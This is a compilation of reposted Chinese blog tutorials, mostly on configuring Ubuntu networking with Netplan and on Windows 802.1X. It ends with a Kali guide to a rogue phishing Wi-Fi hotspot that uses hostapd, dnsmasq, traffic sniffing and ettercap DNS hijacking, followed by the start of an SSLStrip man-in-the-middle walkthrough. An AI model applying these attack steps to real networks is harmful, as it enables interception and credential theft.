Ubuntu Server 配置无线网络

本文转自 muzing 并作补充

本文简单记录了在 Ubuntu Server 22.04 上通过 Netplan 工具配置网络，连接到 WLAN 的过程。

准备工作

安装无线网络相关配置工具：

• network-manager - 网络管理工具
• wpasupplicant - 提供对 WPA 加密的支持
• wireless-tools - 提供 iwconfig、iwlist 等无线网络配置工具

1	sudo apt install network-manager wpasupplicant wireless-tools

查看网卡硬件：

1 2 3

ifconfig -a # 或者使用 ip a

根据上面的查询结果获得无线网卡名称，记住该名称。（无线网卡的名称一般以 wlan 或 wlp 开头，详情参考本文附录a。）

如果没有看到列出无线网卡，除硬件故常或接触不良外，还可能是因为无线网卡未启动。可以尝试使用如下命令将其启动：

1	sudo ifconfig wlan0 up # 启动名为 wlan0 的网络设备

扫描无线网络

在准备工作中已经安装了 wireless-tools，可以使用 iwlist 命令扫描当前环境中的 Wi-Fi 信号：

1	sudo iwlist wlan0 scan # 注意将 wlan0 换成实际无线网卡的设备名

输出的结果非常详细，也非常长：

如果太多信息造成干扰，可以使用 Linux 的 grep 命令对输出信息进行筛选，例如：

1 2	sudo iwlist wlan0 scan | grep ESSID # 仅查看 Wi-Fi 名称 sudo iwlist wlan0 scan | grep -E "Quality|ESSID" # 查看 Wi-Fi 名称和网络质量

编辑配置文件

进入 Netplan 配置目录，查看其中的默认配置文件：

1 2 3

$ cd /etc/netplan/ $ ls 50-cloud-init.yaml

此机器上的配置文件名为 50-cloud-init.yaml。由于安装方式、系统版本等差异，配置文件的名称可能有所不同，但都是 yaml 格式、位于 /etc/netplan/ 下，根据实际情况使用。使用管理员权限编辑该文件：

1	sudo vim /etc/netplan/50-cloud-init.yaml

添加如下内容：

1 2 3 4 5 6

wifis: wlan0: dhcp4: true access-points: "你的ssid": password: "你的密码"

其中 wlan0 为无线网卡名称，dhcp4 表示开启自动IP地址分配，在 access-points 下可以设置多组 ssid（即通常所说的“Wi-Fi名称”）与密码。

更新后，配置文件内容大致如下：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

network: version: 2 renderer: NetworkManager ethernets: eth0: dhcp4: true optional: true wifis: wlan0: dhcp4: true access-points: "wifi_name1": password: "mypassword" "666": password: "66666666"

连接网络

修改配置文件后，不要立即将其应用生效，而要先使用 netplan try 命令验证新的配置是否有效：

1	sudo netplan try # 检查配置文件中是否有语法错误、尝试用新的配置

如果新的网络配置没有问题，则会出现上面的界面，按下键盘 ENTER 确认即可。如果此时本来就是通过网络以 SSH 方式控制服务器，而新的网络配置出现问题导致连接断开，也不必惊慌，等待两分钟让 netplan 恢复之前的配置即可。

1 2	sudo netplan generate # 生成 renderers 所需的配置文件 sudo netplan apply # 应用 netplan 新配置，将自动重启 network-manager 使修改生效

检查是否已连接至网络（以下任一条命令均可）：

1 2 3

iwconfig ifconfig ip a

如仍未连接至网络，可以尝试手动重启 NetworkManager 或服务器：

1 2	sudo systemctl restart NetworkManager.service sudo reboot

附录a：网卡设备名称简析

在使用 ifconfig -a 或 ip a 列出本机所有网卡设备名称时，可能看到若干名称，其含义简单分析如下：

• lo 表示 local
• en 表示 ethernet 以太网
• wl 表示 wlan，即 Wireless Local Area Network 无线局域网
• 后面的 p2s0 等表示 PCIe 接口的物理位置(bus, slot)，总线与插槽

例如， wlp4s0 表示一张位于 PCIe 总线4 插槽0 的无线网卡。

附录b：树莓派连接无线网络

在使用新安装 Ubuntu Server 系统的树莓派时，可能遇到手头没有显示器、也没有有线网络连接的情况。这时本可以通过电脑 SSH 连接至树莓派进行远程开发，但前提是树莓派必须已经接入无线局域网络；而为了让树莓派接入网络，又需要用 SSH 连接后才能修改 Netplan 配置文件，陷入僵局。解决问题的办法是，在树莓派系统启动之前就完成对网络的配置：通过修改安装着树莓派的操作系统的存储卡中的特定文件即可实现。

将存储卡通过读卡器连接到电脑，可以看到 system-boot 和 writable 两个分区，打开 system-boot 分区，搜索名为 network-config 的文件：

使用文本编辑工具打开该文件：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

# This file contains a netplan-compatible configuration which cloud-init will # apply on first-boot (note: it will *not* update the config after the first # boot). Please refer to the cloud-init documentation and the netplan reference # for full details: # # https://netplan.io/reference # https://cloudinit.readthedocs.io/en/latest/topics/network-config.html # https://cloudinit.readthedocs.io/en/latest/topics/network-config-format-v2.html # ... # Some additional examples are commented out below network: version: 2 ethernets: eth0: dhcp4: true optional: true # wifis: # wlan0: # dhcp4: true # optional: true # access-points: # myhomewifi: # password: "S3kr1t" # myworkwifi: # password: "correct battery horse staple" # workssid: # auth: # key-management: eap # method: peap # identity: "me@example.com" # password: "passw0rd" # ca-certificate: /etc/my_ca.pem

可以看到，该文件的格式与语法正是 Netplan 形式，用于在首次启动系统时初始化 Netplan 配置。参考原本注释掉的示例和本文正文，编辑该配置文件，添加 Wi-Fi 信息并保存。

完成配置文件的编辑后，将存储卡插回到树莓派中，通电开机，即会自动连接至无线网络。进入路由器后台管理，即可看到设备名为 ubuntu 的设备，记住其局域网 IP 地址，在电脑上使用 ssh 连接即可：

1	ssh ubuntu@192.168.3.24

如果没有路由器的管理员权限，无法进入后台查看树莓派的 IP，可以在电脑上尝试使用 Angry IP Scanner 等 IP 扫描工具寻找。

附录c：Netplan原理简述

Netplan 本身只是一个用于网络配置的辅助小工具，它将读取 /etc/netplan/*.yaml 配置文件，然后据此生成 renderer 所需的配置文件，并重启 renderer 使修改生效。目前 Netplan 支持的 renderer 包括 NetworkManager 与 Systemd-networkd 两种。这样用户只需修改简洁清晰、YAML格式、统一的 Netplan 配置文件，而无需为每个 renderer 编辑其配置文件。

参考

• Netplan 官方文档

netplan网络配置

本文转自 cloud-atlas 并作补充

Ubuntu发行版默认使用 netplan.io 配置网络接口，例如我在在 树莓派Ubuntu网络设置 中就使用了netplan。netplan支持后端使用 networkd 或者 network-manager 进行管理配置。

netplan简介

激活netplan

Ubuntu在服务器版本默认激活了netplan来配置管理网络，但是在桌面版本，则默认使用NetworkManager管理网络。例如 Jetson Nano快速起步 可以看到Jetson使用Ubuntu的18.04桌面版本，所以我们需要安装并激活netplan。

• 安装netplan:

  1	apt install netplan.io

备注

在 Ubuntu 18.04.4 LTS 上，提供了2个软件包:

1 2	netplan netplan.io

建议完整安装 netplan.io ，这个版本跟随 netplan.io 官方更新，修复了一些问题。

当前 Ubuntu 20.04.3 LTS 已默认安装 netplan.io ，不再提供旧版本 netplan

使用netplan配置静态IP

对于Kubernetes master等服务器，我期望IP地址是固定的IP地址，所以准备配置static IP。不过，Ubuntu 18系列的静态IP地址配置方法和以前传统配置方法不同，采用了 .yaml 配置文件，通过 netplan 网络配置工具来修改。

备注

根据Ubuntu的安装不同，有可能你的安装并没有包含Netplan，则依然可以采用传统的Debian/Ubuntu配置静态IP的方法，即直接修改 /etc/network/interfaces 来实现。不过，从Ubuntu 17.10 开始，已经引入了 Netplan 网络配置工具。

Netplan允许通过YAML抽象来配置网络接口，在 NetworkManager 和 systemd-networkd 网络服务（引用为 renderers )结合共同工作。

Netplan会读取 /etc/netplan/*.yaml 配置文件来设置所有的网络接口。

列出所有激活的网络接口

• 使用 ifconfig 命令列出所有网络接口:

  1	ifconfig -a

例如，看到的输出数据（DHCP）:

1 2 3 4 5 6 7 8

ens2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.122.61 netmask 255.255.255.0 broadcast 192.168.122.255 inet6 fe80::5054:ff:fe97:c338 prefixlen 64 scopeid 0x20<link> ether 52:54:00:97:c3:38 txqueuelen 1000 (Ethernet) RX packets 382 bytes 45170 (45.1 KB) RX errors 0 dropped 84 overruns 0 frame 0 TX packets 165 bytes 22890 (22.8 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

• 默认在 /etc/netplan 目录下有一个 01-netcfg.yaml 内容如下:

netplan初始DHCP配置

1 2 3 4 5 6 7 8

# This file describes the network interfaces available on your system # For more information, see netplan(5). network: version: 2 renderer: networkd ethernets: ens2: dhcp4: yes

备注

如果安装操作系统的时候没有自动创建一个 YAML 配置文件，可以通过以下命令先生成一个:

1	sudo netplan generate

不过，对于Ubuntu的desktop, server, cloud版本，自动生成的配置文件会采用不同的名字，例如 01-network-manager-all.yaml 或 01-netcfg.yaml 。

• 编辑 /etc/netplan/01-netcfg.yaml :

netplan 静态IPP配置

1 2 3 4 5 6 7 8 9 10 11

network: version: 2 renderer: networkd ethernets: ens2: dhcp4: no dhcp6: no addresses: [192.168.122.11/24, ] gateway4: 192.168.122.1 nameservers: addresses: [192.168.122.1, ]

• 执行以下命令生效（注意在控制台执行，否则网络会断开）:

  1	sudo netplan apply

• 验证检查 ifconfig -a 可以看到IP地址已经修改成静态配置IP地址

netplan配置一个网卡多个IP

有时候需要在一个网卡上配置多个IP地址，实现单臂网桥路由，netplan也支持 interface alias 。配置方法很简单:

1 2 3 4 5 6 7 8 9

network: version: 2 renderer: networkd ethernets: enp3s0: addresses: - 10.100.1.38/24 - 10.100.1.39/24 gateway4: 10.100.1.1

或者:

1 2 3

ethernets: enp3s0: addresses: [ 10.100.1.38/24, 10.100.1.39/24 ]

执行 netplan apply 可以看到系统网卡:

1 2	enp3s0 enp3s0:1

分配了IP地址 10.100.1.38 和 10.100.1.39

netplan配置有线802.1x认证

企业网络常常会使用802.1x网络实现认证，不仅无线可以通过这种方式加强安全，有线网络也可以实现。netplan也支持在有线网络上加上认证功能，配置案例有些类似后文 WPA Enterprise无线网络 ，案例 01-eno4-config.yaml 如下:

netplan 802.1x配置

1 2 3 4 5 6 7 8 9 10 11 12 13

network: version: 2 renderer: networkd ethernets: eno4: dhcp4: yes dhcp6: no macaddress: xx:xx:xx:xx:xx:xx auth: key-management: 802.1x method: peap identity: "USERNAME" password: "PASSWD"

然后执行 netplan apply 即完成网络激活

netplan配置无线

连接开放无线网络

对于没有密码要求的无线网络，只需要定义access point:

1 2 3 4 5 6 7

network: version: 2 wifis: wlan0: access-points: "open_network_ssid_name": {} dhcp4: yes

连接WPA Personal无线

对于采用WPA密码保护的无线网络，配置access-point和对应的password就可以。

• 配置 /etc/netplan/02-homewifi.yaml

  1 2 3 4 5 6 7 8 9 10 11 12 13 14

  network: version: 2 renderer: networkd wifis: wlan0: dhcp4: yes dhcp6: no #addresses: [192.168.1.21/24] #gateway4: 192.168.1.1 #nameservers: # addresses: [192.168.0.1, 8.8.8.8] access-points: "network_ssid_name": password: "**********"

WPA Enterprise无线网络

在企业网络中，常见的是使用 WPA 或 WPA2 Enterprise加密方式的无线网络，则需要添加认证信息。

• 以下案例是 WPA-EAP 和 TTLS 加密无线网络连接配置:

  1 2 3 4 5 6 7 8 9 10 11 12 13

  network: version: 2 wifis: wl0: access-points: workplace: auth: key-management: eap method: ttls anonymous-identity: "@internal.example.com" identity: "joe@internal.example.com" password: "v3ryS3kr1t" dhcp4: yes

• 以下案例是 WPA-EAP 和 TLS加密无线网络:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  network: version: 2 wifis: wl0: access-points: university: auth: key-management: eap method: tls anonymous-identity: "@cust.example.com" identity: "cert-joe@cust.example.com" ca-certificate: /etc/ssl/cust-cacrt.pem client-certificate: /etc/ssl/cust-crt.pem client-key: /etc/ssl/cust-key.pem client-key-password: "d3cryptPr1v4t3K3y" dhcp4: yes

netplan mac spoof

如果使用 networkd 后端，则不支持wifi匹配，只能使用接口名字。以下为举例:

1 2 3 4 5 6 7 8 9

network: version: 2 renderer: networkd wifis: wlan0: dhcp4: yes dhcp6: no macaddress: xx:xx:xx:xx:xx:xx ...

如果使用NetworkManager后端，还可以采用 match: 方法:

1 2 3 4 5 6 7 8 9 10 11

network: version: 2 renderer: networkd wifis: wlan0: dhcp4: yes dhcp6: no match: macaddress: yy:yy:yy:yy:yy:yy macaddress: xx:xx:xx:xx:xx:xx ...

netplan配置bonding

简单active-backup bonding

• 参考原先安装虚拟机自动生成的 /etc/netplan/50-cloud-init.yaml 注释内容，禁用cloud-init网络配置，即创建 /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg 内容如下:

  1	network: {config: disabled}

备份原配置:

1 2 3

cp /etc/netplan/50-cloud-init.yaml ~/ cd /etc/netplan rm -f 50-cloud-init.yaml

• 编辑 /etc/netplan/01-netcfg.yaml

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  network: version: 2 renderer: networkd ethernets: ens33: dhcp4: no dhcp6: no ens38: dhcp4: no dhcp6: no bonds: bond0: interfaces: [ens33, ens38] parameters: mode: active-backup mii-monitor-interval: 1 primary: ens33 addresses: [192.168.161.10/24, ] gateway4: 192.168.161.1 nameservers: addresses: [127.0.0.53, ]

bonding上增加VLAN

• 编辑 /etc/netplan/01-netcfg.yaml

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  network: version: 2 renderer: networkd ethernets: eth0: dhcp4: no dhcp6: no eth1: dhcp4: no dhcp6: no bonds: bond0: interfaces: [eth0, eth1] parameters: mode: active-backup mii-monitor-interval: 1 primary: eth0 vlans: bond0.22: id: 22 link: bond0 addresses: [ "192.168.1.24/24" ] gateway4: 192.168.1.1 nameservers: addresses: [ "192.168.1.1", "192.168.1.17", "192.168.1.33" ] search: [ "huatai.me", "huatai.net", "huatai.com" ]

备注

Red Hat Enterprise Linux 7 Networking Guide Using Channel Bonding 提供了详细的参数设置，通常 miimon=time_in_milliseconds 设置 100 表示100ms，也就是 0.1s 。不过这里我参考netplan文档设置为1s。

有关 VLAN over bonding配置请参考 Netplan - configuring 2 vlan on same bonding

没有netplan配置systemd-networkd

实际上你可以不使用netplan也不使用NetworkManager就可以配置网络，因为 Systemd进程管理器 实际上提供了完整的系统配置功能。默认启动的 systemd-networkd 接管了所有网络配置，所以手工添加配置也可以实现配置。

所有的 systemd-networkd 配置位于 /etc/systemd/network/ 目录下，例如， enp0s25.network 配置内容:

1 2 3 4 5 6 7

[Match] Name=enp0s25 [Network] Address=192.168.6.9/24 GATEWAY=192.168.6.10 DNS=192.168.6.10

此时只需要重新加载一次 systemd-networkd 就可以:

1	systemctl restart systemd-networkd

netplan问题排查

警告

netplan似乎不需要作为服务启动，而仅仅是作为一个前端工具，实际调用的是 networkd 和 NetworkManager来完成配置。我在Jetson Nano的Ubuntu 18.04使用netplan失败，似乎这个版本比较老，和现有netplan文档不能对齐，并且使用也很怪异，所以我还是使用 切换NetworkManager 重新切回NetworkManager进行管理。

以下是一些debug经验记录，仅供参考。

切换NetworkManager 之后，我在 NVIDIA Jetson 上将NetworkManager切换成netplan。但是，我发现 netplan apply 之后，网卡上并没有绑定静态配置的IP地址。虽然看上去 /etc/netplan/01-netcfg.yaml 和原先在树莓派上运行的Ubuntu 20.04没有什么区别:

1 2 3 4 5 6 7 8 9 10

network: version: 2 renderer: networkd ethernets: eth0: dhcp4: no dhcp6: no addresses: [192.168.6.10/24, ] nameservers: addresses: [202.96.209.133, ]

既然使用 networkd 作为 renderer ，就应该生成 systemd-networkd 使用的配置文件，但是在 /etc/systemd/network 目录下没有生成任何配置文件。

参考 networkd not applying config - missing events? 可以看到，需要使用 networkctl list 查看一下网卡是否受到管理:

1	networkctl list

果然，我输出显示:

1 2 3 4 5 6 7 8

IDX LINK TYPE OPERATIONAL SETUP 1 lo loopback carrier unmanaged 2 dummy0 ether off unmanaged 3 eth0 ether routable unmanaged 4 wlan0 wlan off unmanaged 5 l4tbr0 ether off unmanaged 6 rndis0 ether no-carrier unmanaged 7 usb0 ether no-carrier unmanaged

对比树莓派上 networkctl list 显示输出:

1 2 3 4

IDX LINK TYPE OPERATIONAL SETUP 1 lo loopback carrier unmanaged 2 eth0 ether routable configured 3 wlan0 wlan routable configured

networkctl

参考 networkctl — Query the status of network links networkctl 可以用于检查网络连线的状态是否被 systemd-networkd 看到。参考 systemd-networkd.service, systemd-networkd — Network manager :

• systemd-networkd 会管理在 [Match] 段落找到的 .network 文件中的任何连接来管理网络地址和路由。
• 由于我执行 netplan apply 没有生成对应的 networkd 配置文件，所以导致网络没有配置

我尝试先创建空的 /etc/netplan 目录，然后执行:

1	netplan -d generate

显示:

1 2 3 4 5 6 7

netplan: netplan version 2.2 starting at Tue Oct 13 22:54:14 2020 netplan: database directory is /var/lib/plan/netplan.dir netplan: user "netplan" is uid 63434 gid 63434 netplan: switching from user <root> to <uid 63434 gid 63434> netplan: running with uid=63434 gid=63434 euid=63434 egid=63434 netplan: reading access list file /var/lib/plan/netplan.dir/.netplan-acl netplan: netplan/tcp not found in /etc/services, using ports 2983 and 5444

• 仔细检查了 systemctl status netplan ，发现原因了：没有激活netplan daemon:

  1 2 3 4 5 6 7 8 9

  ● netplan.service - LSB: Netplan calendar service. Loaded: loaded (/etc/init.d/netplan; generated) Active: active (exited) since Tue 2020-10-13 21:12:52 CST; 1h 47min ago Docs: man:systemd-sysv-generator(8) Process: 4631 ExecStart=/etc/init.d/netplan start (code=exited, status=0/SUCCESS) 10月 13 21:12:51 jetson systemd[1]: Starting LSB: Netplan calendar service.... 10月 13 21:12:52 jetson netplan[4631]: Netplan daemon not enabled in /etc/init.d/netplan. 10月 13 21:12:52 jetson systemd[1]: Started LSB: Netplan calendar service..

上述日志显示在 /etc/init.d/netplan 中没有激活netplan服务，所以实际该服务状态是 active(exited) ，也就是退出状态。

编辑 /etc/init.d/netplan 文件，将:

1 2	# Set ENABLED=0 to disable, ENABLED=1 to enable. ENABLED=0

修改成:

1 2	# Set ENABLED=0 to disable, ENABLED=1 to enable. ENABLED=1

• 然后再次执行启动 netplan

  1	systemctl start netplan

此时提示:

1	Warning: The unit file, source configuration file or drop-ins of netplan.service changed on disk. Run 'systemctl daemon-reload' to reload units.

所以按照提示执行:

1 2	systemctl daemon-reload systemctl restart netplan

启动之后再次检查 systemctl status netplan 则可以看到状态:

1 2 3 4 5 6 7 8 9 10 11 12

● netplan.service - LSB: Netplan calendar service. Loaded: loaded (/etc/init.d/netplan; generated) Active: active (running) since Tue 2020-10-13 23:07:44 CST; 1min 8s ago Docs: man:systemd-sysv-generator(8) Process: 8386 ExecStop=/etc/init.d/netplan stop (code=exited, status=0/SUCCESS) Process: 8430 ExecStart=/etc/init.d/netplan start (code=exited, status=0/SUCCESS) Tasks: 1 (limit: 4174) CGroup: /system.slice/netplan.service └─8464 /usr/sbin/netplan 10月 13 23:07:43 jetson systemd[1]: Starting LSB: Netplan calendar service.... 10月 13 23:07:44 jetson systemd[1]: Started LSB: Netplan calendar service..

• 但是比较奇怪，我执行 netplan -d generate 始终不生成配置文件，仅提示:

  1 2 3 4 5 6 7

  netplan: netplan version 2.2 starting at Tue Oct 13 23:25:29 2020 netplan: database directory is /var/lib/plan/netplan.dir netplan: user "netplan" is uid 63434 gid 63434 netplan: switching from user <root> to <uid 63434 gid 63434> netplan: running with uid=63434 gid=63434 euid=63434 egid=63434 netplan: reading access list file /var/lib/plan/netplan.dir/.netplan-acl netplan: netplan/tcp not found in /etc/services, using ports 2983 and 5444

根据 netplan-generate - generate backend configuration from netplan YAML files 说明：

• netplan generate 是根据 netplan 的 yaml配置来调用networkd后端或者NetworkManager后端来生成对应后端服务的配置文件
• 通常不需要独立运行 netplan generate ，只需要运行 netplan apply 就可以，因为 netplan apply 会自动调用 netplan generate ，而 netplan generate 只是为了验证配置生成
• netplan 会一次从以下3个位置读取配置文件，并且按照优先级，仅有一个位置的配置文件生效:
  • /run/netplan 优先级最高
  • /etc/netplan 次优先级
  • /lib/netplan 最低优先级

参考 netplan - Troubleshooting networking issues 当出现配置不能生成，需要将后端服务器启动成debug模式。例如，我使用 systemd-netowrkd 则需要启用 DebuggingSystemd

1 2	sudo systemctl stop systemd-networkd SYSTEMD_LOG_LEVEL=debug /lib/systemd/systemd-networkd

但是我发现我执行 netplan generate 和 netplan apply 都没有任何影响，似乎就没有连接上。

虽然手工可以创建一个 /run/systemd/network/10-netplan-eth0.network 填写内容:

1 2 3 4 5 6 7

[Match] Name=eth0 [Network] LinkLocalAddressing=ipv6 Address=192.168.6.10/24 DNS=202.96.209.133

配置创建后，执行 networkctl 就可以看到该eth0网卡是 configured ，似乎状态正常了。但是重启主机则网卡又是 unmanaged 并且 /run/systemd/network 目录又空了。

发现一个蹊跷，执行 netplan -d -v generate 显示输出:

1 2 3

netplan: netplan version 2.2 starting at Wed Oct 14 09:46:03 2020 netplan: database directory is /var/lib/plan/netplan.dir ...

为何显示数据库目录是 /var/lib/plan/netplan.dir ?

我这个版本的netplan默认去读取了空白的 /var/lib/plan/netplan.dir ，这个和官方文档不同。我尝试移除这个目录:

1 2	cd /var/lib mv plan plan.bak

再次启动 netplan -d -v generate 显示:

1 2 3 4 5 6

netplan: netplan version 2.2 starting at Wed Oct 14 09:49:16 2020 netplan: database directory is /var/lib/plan/netplan.dir netplan: user "netplan" is uid 63434 gid 63434 netplan: switching from user <root> to <uid 63434 gid 63434> netplan: running with uid=63434 gid=63434 euid=63434 egid=63434 netplan: no read/write access to /var/lib/plan/netplan.dir/.: No such file or directory

这个版本的netplan可能是早期版本( 实践是在 Ubuntu 18 上，安装了 netplan 而没有安装更完整的 netplan.io 根据网友impl1874提供信息( use netplan.io please #10 )，需要通过完整安装 netplan.io 来修复这个问题。

我在上文中补充说明，建议直接安装 netplan.io )，只能固定读取 /var/lib/plan/netplan.dir/ ，不使用 /etc/netplan 目录，导致我配置无效。我还发现在 /var/lib/plan/netplan.dir/ 有一个隐含文件:

1	.netplan-acl -> /etc/plan/netplan-acl

警告

上述排查是我早期的记录，当时安装的操作系统是 Ubuntu 18 LTS，安装的 netplan 存在bug，请完整安装 netplan.io 来避免这个问题。

最新的 Ubuntu 20.04 LTS 默认即使用 netplan.io 没有这个问题。

5G Hz无线网络连接

在树莓派上配置了netplan的无线配置，配置文件 /etc/netplan/02-wifi.yaml:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

network: version: 2 renderer: networkd wifis: wlan0: optional: true dhcp4: yes dhcp6: no access-points: "SSID-HOME": password: "home-passwd" "SSID-OFFICE": auth: key-management: eap identity: "office.id" password: "office-passwd"

但是发现无线始终无法连接， ip addr 显示:

1 2	3: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 1000 link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff

• 使用 iwconfig 检查:

  1 2 3 4 5

  wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=31 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on

• 使用 networkctl list 检查发现:

  1 2 3 4 5 6

  IDX LINK TYPE OPERATIONAL SETUP 1 lo loopback carrier unmanaged 2 eth0 ether routable configured 3 wlan0 wlan no-carrier configuring 3 links listed.

• 检查无线网络连接服务配置状态:

  1	systemctl status netplan-wpa-wlan0.service

显示连接了一个明显错误的 bssid=00:00:00:00:00:00 的无线AP，导致认证错误:

1 2 3 4 5 6 7 8 9 10 11 12

● netplan-wpa-wlan0.service - WPA supplicant for netplan wlan0 Loaded: loaded (/run/systemd/system/netplan-wpa-wlan0.service; enabled-runtime; vendor preset: enabled) Active: active (running) since Thu 2020-11-05 16:17:34 CST; 2min 7s ago Main PID: 1932 (wpa_supplicant) Tasks: 1 (limit: 9257) CGroup: /system.slice/netplan-wpa-wlan0.service └─1932 /sbin/wpa_supplicant -c /run/netplan/wpa-wlan0.conf -iwlan0 Nov 05 16:18:51 pi-worker2 wpa_supplicant[1932]: wlan0: CTRL-EVENT-ASSOC-REJECT bssid=00:00:00:00:00:00 status_code=16 Nov 05 16:10:27 pi-worker2 wpa_supplicant[1849]: wlan0: Trying to associate with SSID 'SSID-OFFICE' Nov 05 16:10:30 pi-worker2 wpa_supplicant[1849]: wlan0: CTRL-EVENT-ASSOC-REJECT bssid=00:00:00:00:00:00 status_code=16 Nov 05 16:10:30 pi-worker2 wpa_supplicant[1849]: wlan0: CTRL-EVENT-SSID-TEMP-DISABLED id=0 ssid="SSID-OFFICE" auth_failures=1 duration=23 reason=CONN_FAILED

经过一周 排查wpa_supplicant无法连接5GHz无线问题 终于发现对于5G Hz无线网络连接，必须在 wpa_supplicant.conf 中指定 Country Code 。

不过，netplan的配置中当前不支持配置 country= ，所以可以采用两种方法：

• 在执行 wpa_supplicant 之前，先通过 wireless-tools 工具包中的 iw 命令设置 regdomain

  1	iw reg set CN

然后 wpa_supplicant 就可以连接5G Hz的无线AP。

• 为了能够持久化上述 regdomain 配置，在Ubuntu中，可以修改 /etc/default/crda 配置设置如下:

  1	REGDOMAIN=CN

然后重启就能够正常连接5G Hz无线网络。

参考

• How to Configure Network Static IP Address in Ubuntu 18.04
• Netplan configuration examples
• Netplan not spoofing MAC as expected
• Netplan reference
• How to configure networking with Netplan on Ubuntu

WIN10系统使用自带软件进行有线802.1X认证时的配置方法

本文转自 丁晏 并作补充

前提条件

选择“开始 > 控制面板”，依次单击“系统和安全”、“管理工具”和“服务”，确认“Extensible Authentication Protocol”和“Wired AutoConfig”两个服务的“启动类型”为“自动”，“状态”为“正在运行”。

操作步骤

1、选择“开始 > 控制面板”。
2、在“控制面板”选择“网络和Internet > 网络和共享中心 > 查看网络状态和任务 > 以太网”（控制面板的“查看方式”选择“类别”时可显示“网络和Internet”）。

3、在“以太网状态”窗口，选择“属性”。
4、在“身份验证”页签，选中“启用IEEE 802.1X身份验证”，“选择网络身份验证方法”设置为“Microsoft: 受保护的EAP（PEAP）”，单击“设置”。

5、取消勾选“通过验证证书来验证服务器的身份”，“选择身份验证方法”选择“安全密码（EAP-MSCHAP v2）”，单击“配置”。

6、取消选中“自动使用 Windows 登录名和密码”，单击“确定”。

说明：如果操作系统使用AD域帐号登录，并且用来进行802.1X认证的用户名和密码也是使用的登录操作系统的域帐号和密码，则勾选“自动使用Windows登录名和密码”。

7、等待Windows弹出认证框，即可输入用户名和密码进行认证。

kali搭建钓鱼WiFi

本文转自逍遥子 并作补充

如何在kali下快速搭建钓鱼WiFi呢？全网最简单最详细的教程核能来袭。一起来看看吧。

准备

• USB无线网卡（推荐8187 3070）
• hostapd dnsmasq apache2
• kali2020(最新版)

配置无线网卡

在终端执行 ifconfig查看是否有 wlan0如果存在，我们需要激活为监听模式。执行命令：

1	airmon-ng start wlan0

配置hostapd

1	vim hostapd.conf

写入下面内容

1 2 3 4 5 6 7

interface=wlan0mon driver=nl80211 ssid=Chinanet #无线名称 随意即可 hw_mode=g channel=6 macaddr_acl=0 ignore_broadcast_ssid=0

配置dnsmasq文件

终端执行

1	vim dnsmasq.conf

写入内容如下：

1 2 3 4 5 6 7 8

interface=wlan0mon dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h dhcp-option=3, 192.168.1.1 dhcp-option=6, 192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1

配置防火墙和端口转发

1 2 3

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface wlan0mon -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward

这样做的目的是保证我们的鱼儿能够正常上网。

给无线网卡分配IP地址

1 2	ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

启动钓鱼热点

1	hostapd hostapd.conf

这样我们便可以看到有一个 china-net的热点，但是不能连接，不要着急，我们启动dnsmasq即可。

1	dnsmasq -C dnsmasq.conf -d

这样，我们的热点便可以正常连接并上网了。

左边为连接的设备，右边有设备访问的网站信息。

高级操作

嗅探目标图片

在终端执行

1	driftnet -i wlan0mon

便可以看到目标访问的站点图片信息。

中间人攻击

域名重定向

修改 /etc/ettercap/etter.dns文件，添加内容如下：

1 2 3

baidu.com A 192.168.1.1 *.baidu.com A 192.168.1.1 www.baidu.com PTR 192.168.1.1

即，当我们访问百度，自动跳转到本地。
开启本地 apache

1	service apache2 start

将做好的钓鱼页面放到 /var/www/html目录下，然后终端执行 ettercap -G利用 ettercap进行DNS劫持，具体做法这里不再诉述。

当然，你也可以对目标进行数据包的捕获和分析，我们这里也不再说了。

填个坑

有不少人搭建完成后，反应上不了网，是因为dns冲突了。如你家的路由器的网段是192.168.1.1/24而在dns的配置文件中dhcp-option=3, 192.168.1.1这样会冲突，解决办法很简单，把192.168.1.1改成其他网段就行了，如192.168.5.1，但是后面的规则也要改。最简单的方法就是登陆路由器，将lan口地址192.168.1.1改掉就行了！

如何进行一次完整的 SSLStrip 攻击

本文转自Glsakura 并作补充

简介

本文将介绍在局域网内，如何监听受害者流量并通过SSLstrip攻击获取敏感信息，分为如下两步：

1. 中间人攻击，监听受害者流量
2. SSLStrip攻击，获取敏感信息

实验环境

IP地址	MAC地址
win10	192.168.40.1	00:50:56:C0:00:08
网关	192.168.40.2	00:50:56:E7:9F:31
kali	192.168.40.128	00:0c:29:d8:d4:05
win7	192.168.40.130	00:0C:29:C9:34:A6
centos7	192.168.40.132	00:0c:29:bd:ef:65

kali：kali-linux-2020.1b-live-amd64.iso

win7：win7

纯净虚拟机系统，使用VMware或者VirtualBox导入镜像即可。
采用Win7SP1镜像制作，极限精简，无多余组件，非常纯净，使用流畅，系统已激活。

中间人攻击

中间人攻击（man-in-the-Middle Attack, MITM)，就是攻击者扮演中间人进行攻击，可以劫持一段会话，窃取凭证和其他机密信息。简而言之，所谓的MITM攻击就是通过拦截正常的网络通信数据，并进行数据篡改和嗅探，而通信的双方却毫不知情。

ARP （地址解析协议）

ARP 协议负责通过 IP 地址找到 MAC 地址（物理地址 ），在以太网中，是利用 MAC 地址来通讯的。

